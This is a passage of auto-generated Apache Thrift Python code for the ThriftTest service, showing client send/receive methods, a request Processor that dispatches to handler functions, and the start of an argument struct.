args = testDouble_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testDouble(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testDouble_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testDouble failed: unknown result")
def testBinary(self, thing):
"""
Prints 'testBinary("%s")' where '%s' is a hex-formatted string of thing's data
@param binary thing - the binary data to print
@return binary - returns the binary 'thing'
Parameters:
- thing
"""
self.send_testBinary(thing)
return self.recv_testBinary()
def send_testBinary(self, thing):
self._oprot.writeMessageBegin('testBinary', TMessageType.CALL, self._seqid)
args = testBinary_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testBinary(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testBinary_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testBinary failed: unknown result")
def testStruct(self, thing):
"""
Prints 'testStruct("{%s}")' where thing has been formatted into a string of comma separated values
@param Xtruct thing - the Xtruct to print
@return Xtruct - returns the Xtruct 'thing'
Parameters:
- thing
"""
self.send_testStruct(thing)
return self.recv_testStruct()
def send_testStruct(self, thing):
self._oprot.writeMessageBegin('testStruct', TMessageType.CALL, self._seqid)
args = testStruct_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testStruct(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testStruct_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testStruct failed: unknown result")
def testNest(self, thing):
"""
Prints 'testNest("{%s}")' where thing has been formatted into a string of the nested struct
@param Xtruct2 thing - the Xtruct2 to print
@return Xtruct2 - returns the Xtruct2 'thing'
Parameters:
- thing
"""
self.send_testNest(thing)
return self.recv_testNest()
def send_testNest(self, thing):
self._oprot.writeMessageBegin('testNest', TMessageType.CALL, self._seqid)
args = testNest_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testNest(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testNest_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testNest failed: unknown result")
def testMap(self, thing):
"""
Prints 'testMap("{%s")' where thing has been formatted into a string of 'key => value' pairs
separated by commas and new lines
@param map<i32,i32> thing - the map<i32,i32> to print
@return map<i32,i32> - returns the map<i32,i32> 'thing'
Parameters:
- thing
"""
self.send_testMap(thing)
return self.recv_testMap()
def send_testMap(self, thing):
self._oprot.writeMessageBegin('testMap', TMessageType.CALL, self._seqid)
args = testMap_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testMap(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testMap_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testMap failed: unknown result")
def testStringMap(self, thing):
"""
Prints 'testStringMap("{%s}")' where thing has been formatted into a string of 'key => value' pairs
separated by commas and new lines
@param map<string,string> thing - the map<string,string> to print
@return map<string,string> - returns the map<string,string> 'thing'
Parameters:
- thing
"""
self.send_testStringMap(thing)
return self.recv_testStringMap()
def send_testStringMap(self, thing):
self._oprot.writeMessageBegin('testStringMap', TMessageType.CALL, self._seqid)
args = testStringMap_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testStringMap(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testStringMap_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testStringMap failed: unknown result")
def testSet(self, thing):
"""
Prints 'testSet("{%s}")' where thing has been formatted into a string of values
separated by commas and new lines
@param set<i32> thing - the set<i32> to print
@return set<i32> - returns the set<i32> 'thing'
Parameters:
- thing
"""
self.send_testSet(thing)
return self.recv_testSet()
def send_testSet(self, thing):
self._oprot.writeMessageBegin('testSet', TMessageType.CALL, self._seqid)
args = testSet_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testSet(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testSet_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testSet failed: unknown result")
def testList(self, thing):
"""
Prints 'testList("{%s}")' where thing has been formatted into a string of values
separated by commas and new lines
@param list<i32> thing - the list<i32> to print
@return list<i32> - returns the list<i32> 'thing'
Parameters:
- thing
"""
self.send_testList(thing)
return self.recv_testList()
def send_testList(self, thing):
self._oprot.writeMessageBegin('testList', TMessageType.CALL, self._seqid)
args = testList_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testList(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testList_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testList failed: unknown result")
def testEnum(self, thing):
"""
Prints 'testEnum("%d")' where thing has been formatted into it's numeric value
@param Numberz thing - the Numberz to print
@return Numberz - returns the Numberz 'thing'
Parameters:
- thing
"""
self.send_testEnum(thing)
return self.recv_testEnum()
def send_testEnum(self, thing):
self._oprot.writeMessageBegin('testEnum', TMessageType.CALL, self._seqid)
args = testEnum_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testEnum(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testEnum_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testEnum failed: unknown result")
def testTypedef(self, thing):
"""
Prints 'testTypedef("%d")' with thing as '%d'
@param UserId thing - the UserId to print
@return UserId - returns the UserId 'thing'
Parameters:
- thing
"""
self.send_testTypedef(thing)
return self.recv_testTypedef()
def send_testTypedef(self, thing):
self._oprot.writeMessageBegin('testTypedef', TMessageType.CALL, self._seqid)
args = testTypedef_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testTypedef(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testTypedef_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testTypedef failed: unknown result")
def testMapMap(self, hello):
"""
Prints 'testMapMap("%d")' with hello as '%d'
@param i32 hello - the i32 to print
@return map<i32,map<i32,i32>> - returns a dictionary with these values:
{-4 => {-4 => -4, -3 => -3, -2 => -2, -1 => -1, }, 4 => {1 => 1, 2 => 2, 3 => 3, 4 => 4, }, }
Parameters:
- hello
"""
self.send_testMapMap(hello)
return self.recv_testMapMap()
def send_testMapMap(self, hello):
self._oprot.writeMessageBegin('testMapMap', TMessageType.CALL, self._seqid)
args = testMapMap_args()
args.hello = hello
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testMapMap(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testMapMap_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testMapMap failed: unknown result")
def testInsanity(self, argument):
"""
So you think you've got this all worked, out eh?
Creates a the returned map with these values and prints it out:
{ 1 => { 2 => argument,
3 => argument,
},
2 => { 6 => <empty Insanity struct>, },
}
@return map<UserId, map<Numberz,Insanity>> - a map with the above values
Parameters:
- argument
"""
self.send_testInsanity(argument)
return self.recv_testInsanity()
def send_testInsanity(self, argument):
self._oprot.writeMessageBegin('testInsanity', TMessageType.CALL, self._seqid)
args = testInsanity_args()
args.argument = argument
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testInsanity(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testInsanity_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testInsanity failed: unknown result")
def testMulti(self, arg0, arg1, arg2, arg3, arg4, arg5):
"""
Prints 'testMulti()'
@param i8 arg0 -
@param i32 arg1 -
@param i64 arg2 -
@param map<i16, string> arg3 -
@param Numberz arg4 -
@param UserId arg5 -
@return Xtruct - returns an Xtruct with string_thing = "Hello2, byte_thing = arg0, i32_thing = arg1
and i64_thing = arg2
Parameters:
- arg0
- arg1
- arg2
- arg3
- arg4
- arg5
"""
self.send_testMulti(arg0, arg1, arg2, arg3, arg4, arg5)
return self.recv_testMulti()
def send_testMulti(self, arg0, arg1, arg2, arg3, arg4, arg5):
self._oprot.writeMessageBegin('testMulti', TMessageType.CALL, self._seqid)
args = testMulti_args()
args.arg0 = arg0
args.arg1 = arg1
args.arg2 = arg2
args.arg3 = arg3
args.arg4 = arg4
args.arg5 = arg5
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testMulti(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testMulti_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testMulti failed: unknown result")
def testException(self, arg):
"""
Print 'testException(%s)' with arg as '%s'
@param string arg - a string indication what type of exception to throw
if arg == "Xception" throw Xception with errorCode = 1001 and message = arg
elsen if arg == "TException" throw TException
else do not throw anything
Parameters:
- arg
"""
self.send_testException(arg)
self.recv_testException()
def send_testException(self, arg):
self._oprot.writeMessageBegin('testException', TMessageType.CALL, self._seqid)
args = testException_args()
args.arg = arg
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testException(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testException_result()
result.read(iprot)
iprot.readMessageEnd()
if result.err1 is not None:
raise result.err1
return
def testMultiException(self, arg0, arg1):
"""
Print 'testMultiException(%s, %s)' with arg0 as '%s' and arg1 as '%s'
@param string arg - a string indication what type of exception to throw
if arg0 == "Xception" throw Xception with errorCode = 1001 and message = "This is an Xception"
elsen if arg0 == "Xception2" throw Xception2 with errorCode = 2002 and struct_thing.string_thing = "This is an Xception2"
else do not throw anything
@return Xtruct - an Xtruct with string_thing = arg1
Parameters:
- arg0
- arg1
"""
self.send_testMultiException(arg0, arg1)
return self.recv_testMultiException()
def send_testMultiException(self, arg0, arg1):
self._oprot.writeMessageBegin('testMultiException', TMessageType.CALL, self._seqid)
args = testMultiException_args()
args.arg0 = arg0
args.arg1 = arg1
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testMultiException(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testMultiException_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err1 is not None:
raise result.err1
if result.err2 is not None:
raise result.err2
raise TApplicationException(TApplicationException.MISSING_RESULT, "testMultiException failed: unknown result")
def testOneway(self, secondsToSleep):
"""
Print 'testOneway(%d): Sleeping...' with secondsToSleep as '%d'
sleep 'secondsToSleep'
Print 'testOneway(%d): done sleeping!' with secondsToSleep as '%d'
@param i32 secondsToSleep - the number of seconds to sleep
Parameters:
- secondsToSleep
"""
self.send_testOneway(secondsToSleep)
def send_testOneway(self, secondsToSleep):
self._oprot.writeMessageBegin('testOneway', TMessageType.ONEWAY, self._seqid)
args = testOneway_args()
args.secondsToSleep = secondsToSleep
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["testVoid"] = Processor.process_testVoid
self._processMap["testString"] = Processor.process_testString
self._processMap["testBool"] = Processor.process_testBool
self._processMap["testByte"] = Processor.process_testByte
self._processMap["testI32"] = Processor.process_testI32
self._processMap["testI64"] = Processor.process_testI64
self._processMap["testDouble"] = Processor.process_testDouble
self._processMap["testBinary"] = Processor.process_testBinary
self._processMap["testStruct"] = Processor.process_testStruct
self._processMap["testNest"] = Processor.process_testNest
self._processMap["testMap"] = Processor.process_testMap
self._processMap["testStringMap"] = Processor.process_testStringMap
self._processMap["testSet"] = Processor.process_testSet
self._processMap["testList"] = Processor.process_testList
self._processMap["testEnum"] = Processor.process_testEnum
self._processMap["testTypedef"] = Processor.process_testTypedef
self._processMap["testMapMap"] = Processor.process_testMapMap
self._processMap["testInsanity"] = Processor.process_testInsanity
self._processMap["testMulti"] = Processor.process_testMulti
self._processMap["testException"] = Processor.process_testException
self._processMap["testMultiException"] = Processor.process_testMultiException
self._processMap["testOneway"] = Processor.process_testOneway
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_testVoid(self, seqid, iprot, oprot):
args = testVoid_args()
args.read(iprot)
iprot.readMessageEnd()
result = testVoid_result()
try:
self._handler.testVoid()
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testVoid", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testString(self, seqid, iprot, oprot):
args = testString_args()
args.read(iprot)
iprot.readMessageEnd()
result = testString_result()
try:
result.success = self._handler.testString(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testString", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testBool(self, seqid, iprot, oprot):
args = testBool_args()
args.read(iprot)
iprot.readMessageEnd()
result = testBool_result()
try:
result.success = self._handler.testBool(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testBool", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testByte(self, seqid, iprot, oprot):
args = testByte_args()
args.read(iprot)
iprot.readMessageEnd()
result = testByte_result()
try:
result.success = self._handler.testByte(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testByte", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testI32(self, seqid, iprot, oprot):
args = testI32_args()
args.read(iprot)
iprot.readMessageEnd()
result = testI32_result()
try:
result.success = self._handler.testI32(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testI32", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testI64(self, seqid, iprot, oprot):
args = testI64_args()
args.read(iprot)
iprot.readMessageEnd()
result = testI64_result()
try:
result.success = self._handler.testI64(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testI64", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testDouble(self, seqid, iprot, oprot):
args = testDouble_args()
args.read(iprot)
iprot.readMessageEnd()
result = testDouble_result()
try:
result.success = self._handler.testDouble(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testDouble", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testBinary(self, seqid, iprot, oprot):
args = testBinary_args()
args.read(iprot)
iprot.readMessageEnd()
result = testBinary_result()
try:
result.success = self._handler.testBinary(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testBinary", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testStruct(self, seqid, iprot, oprot):
args = testStruct_args()
args.read(iprot)
iprot.readMessageEnd()
result = testStruct_result()
try:
result.success = self._handler.testStruct(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testStruct", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testNest(self, seqid, iprot, oprot):
args = testNest_args()
args.read(iprot)
iprot.readMessageEnd()
result = testNest_result()
try:
result.success = self._handler.testNest(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testNest", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testMap(self, seqid, iprot, oprot):
args = testMap_args()
args.read(iprot)
iprot.readMessageEnd()
result = testMap_result()
try:
result.success = self._handler.testMap(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testMap", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testStringMap(self, seqid, iprot, oprot):
args = testStringMap_args()
args.read(iprot)
iprot.readMessageEnd()
result = testStringMap_result()
try:
result.success = self._handler.testStringMap(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testStringMap", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testSet(self, seqid, iprot, oprot):
args = testSet_args()
args.read(iprot)
iprot.readMessageEnd()
result = testSet_result()
try:
result.success = self._handler.testSet(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testSet", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testList(self, seqid, iprot, oprot):
args = testList_args()
args.read(iprot)
iprot.readMessageEnd()
result = testList_result()
try:
result.success = self._handler.testList(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testList", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testEnum(self, seqid, iprot, oprot):
args = testEnum_args()
args.read(iprot)
iprot.readMessageEnd()
result = testEnum_result()
try:
result.success = self._handler.testEnum(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testEnum", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testTypedef(self, seqid, iprot, oprot):
args = testTypedef_args()
args.read(iprot)
iprot.readMessageEnd()
result = testTypedef_result()
try:
result.success = self._handler.testTypedef(args.thing)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testTypedef", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testMapMap(self, seqid, iprot, oprot):
args = testMapMap_args()
args.read(iprot)
iprot.readMessageEnd()
result = testMapMap_result()
try:
result.success = self._handler.testMapMap(args.hello)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testMapMap", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testInsanity(self, seqid, iprot, oprot):
args = testInsanity_args()
args.read(iprot)
iprot.readMessageEnd()
result = testInsanity_result()
try:
result.success = self._handler.testInsanity(args.argument)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testInsanity", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testMulti(self, seqid, iprot, oprot):
args = testMulti_args()
args.read(iprot)
iprot.readMessageEnd()
result = testMulti_result()
try:
result.success = self._handler.testMulti(args.arg0, args.arg1, args.arg2, args.arg3, args.arg4, args.arg5)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testMulti", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testException(self, seqid, iprot, oprot):
args = testException_args()
args.read(iprot)
iprot.readMessageEnd()
result = testException_result()
try:
self._handler.testException(args.arg)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except Xception as err1:
msg_type = TMessageType.REPLY
result.err1 = err1
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testException", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testMultiException(self, seqid, iprot, oprot):
args = testMultiException_args()
args.read(iprot)
iprot.readMessageEnd()
result = testMultiException_result()
try:
result.success = self._handler.testMultiException(args.arg0, args.arg1)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except Xception as err1:
msg_type = TMessageType.REPLY
result.err1 = err1
except Xception2 as err2:
msg_type = TMessageType.REPLY
result.err2 = err2
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("testMultiException", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_testOneway(self, seqid, iprot, oprot):
args = testOneway_args()
args.read(iprot)
iprot.readMessageEnd()
try:
self._handler.testOneway(args.secondsToSleep)
except TTransport.TTransportException:
raise
except Exception:
logging.exception('Exception in oneway handler')
# HELPER FUNCTIONS AND STRUCTURES
class testVoid_args(object):
__slots__ = (
)
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testVoid_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
